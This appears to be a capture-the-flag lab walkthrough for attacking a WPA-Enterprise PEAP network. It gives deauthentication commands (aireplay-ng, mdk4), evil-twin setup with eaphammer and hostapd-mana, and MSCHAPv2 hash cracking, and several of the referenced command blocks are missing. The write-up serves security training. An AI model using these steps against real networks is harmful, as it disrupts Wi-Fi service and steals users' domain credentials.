Enterprise WIFI Hacking MGT/ EAP-PEAP
Introduction
Enterprise networks use centralised authentication. Your goal is to identify user identities and perform an Evil Twin attack to capture credentials.
EAP Hammer Automation
Phase 1: Task 1 - Reconnaissance
In this phase, you will identify the username, EAP type, and certificate details being used by the target. We need to capture EAP handshake
Enable Monitor Mode:
airmon-ng start wlan0.Locate the Target: Scan for the Enterprise network:
airodump-ng --band abg wlan7mon.
Capture Traffic: Lock onto the channel and BSSID to save a pcap
Simpler Deauth (You dont need to worry about client. You can deauth all)
aireplay-ng→ Part of the Aircrack-ng suite, used for packet injection.-0→ Specifies a deauthentication attack.10→ Number of deauth packets to send (in this case, 10 packets).-a F0:9F:C2:71:22:12→ BSSID (MAC address of the target AP).wlan0mon→ The wireless interface in monitor mode.
Deauth cheatcheet
Look for the WPA Handshake in the Notification
Analyze in Wireshark: Open the capture and apply these filters to find sensitive data:
Filter 1:
eap(to see general EAP traffic).Filter 2:
eap.type(to confirm it is Protected EAP (EAP-PEAP)). Knowing the supported method dictates your next move. For example, if the server supports PEAP or EAP-TTLS, you can proceed with the Rogue AP (Evil Twin) attacksFilter 3:
eap.identity(to find the username, e.g., [email protected]).
Filter 4:
x509af.subject(to gather information on the server certificate).
We can also use Tshark to extract this information
or to be specific
Finding the identity with tshark
we can use Wireshark filtered by “eap” and look for packets with “Response, Identity”.
Alternate method to check authentication type
Once we have a valid user we can force each of the EAP authentication methods to verify which methods the AP supports. We can use “EAP_buster ” for this task.
Phase 2: Task 2 - Evil Twin Attack
Now that you have the username and certificate details, you will create a malicious AP to steal the user's password hash.
Stop Collection:
airmon-ng check kill.Create a Look-alike Certificate: Use the Eaphammer wizard to generate a certificate that mimics the target:
cd /home/rogue1/opt/eaphammer../eaphammer --cert-wizard.
Launch the Evil Twin: Run the attack to negotiate a connection and capture the MSCHAPv2 hash:
Or we can have our AP without the same MAC (I think better)
Capture the Hash: When the client connects, you will see a NETNTLM (MSCHAPv2) hash in the terminal.
Deauthenticate the existing Clients
With “airodump-ng” we detect the MAC of the clients to perform a deauthentication attack. So we do this attack on both clients in parallel. As there are 2 APs we have to perform the attack against the 2 APs, since disconnecting from 1 may connect to the other instead of to our RogueAP.
Or we can run airodump specifically on single channel and then do the deauth in this manner, the channel will remain the same for airreplay attack for deauth.
Option B: Bulk Deauthentication (mdk4) – RECOMMENDED
This is the most efficient method for Enterprise environments as it can target multiple APs simultaneously.
1. Create a Target File If there are multiple APs, save their MAC addresses to a list.
2. Execute the Attack Ensure your interface is in monitor mode and on the correct channel before running the command.
Method 1: Using the Target File
Note: The
-bflag points to your list of BSSIDs.
Method 2: Deauth by ESSID (Simpler)
Note: This targets all APs broadcasting that specific network name.
Phase 3: Cracking the Hash
Once you have the hash (e.g., [email protected]::::...), save it to a file named hashes.txt.
Option A: Hashcat:
Option B: John the Ripper:
Method 2: FreeRADIUS + hostapd-mana
Phase 1: Certificate Configuration
You must modify the FreeRADIUS configuration files to match the target organization's details found during your reconnaissance.
1. Edit CA Configuration
Command:
sudo nano /etc/freeradius/3.0/certs/ca.cnfUpdate the
[certificate_authority]section:countryName = ESstateOrProvinceName = MadridlocalityName = MadridorganizationName = WiFiChallengeemailAddress = [email protected]commonName = "WiFiChallenge CA"
2. Edit Server Configuration
Command:
sudo nano /etc/freeradius/3.0/certs/server.cnfUpdate the
[server]section:countryName = ESstateOrProvinceName = MadridlocalityName = MadridorganizationName = WiFiChallengeemailAddress = [email protected]commonName = "WiFiChallenge Server"
Phase 2: Certificate Generation & User Setup
1. Generate New Certificates Switch to root to refresh the Diffie-Hellman parameters and build the certificates.
2. Create EAP User File This file tells the Rogue AP which authentication protocols to negotiate with victims.
Phase 3: Launching the Attack
1. Create the hostapd-mana Config Save this as /tmp/network.conf. Ensure the ssid matches your target variable.
Better to match channel and use this
2. Execution Reset your interface and start the Rogue AP.
3. Deauthenticate Targets In a new terminal, kick clients off the real APs to force them toward your Rogue AP.
By ESSID (Recommended):
sudo mdk4 wlan1 d -c ${channel} -E ${essid}Targeted:
sudo aireplay-ng -0 0 -e ${essid} -a ${bssid} wlan1
Phase 4: Cracking the Hash
Once a client connects, hostapd-mana will display a hash in the format: user::::challenge:response.
Save the hash:
echo 'user::::challenge:response' > /tmp/hash.txtCrack with Hashcat:
Bash
Note: Mode
-m 5500is for NetNTLMv1 / MSCHAPv2.Cracking with John
Phase 5: Final Connection
After cracking the password, use wpa_supplicant with a client.conf file (specifying key_mgmt=WPA-EAP and phase2="auth=MSCHAPV2") to connect and retrieve the flag from 192.168.1.1.
Use this after you have cracked the domain credentials from your Rogue AP.
Sample Config File (/tmp/client.conf):
Connection Instructions:
Connect: Run
sudo wpa_supplicant -i wlan0 -c /tmp/client.conf.Get IP: Run
sudo dhclient wlan0 -v.Get Flag: Run
curl http://192.168.1.1/proof.txt.
Last updated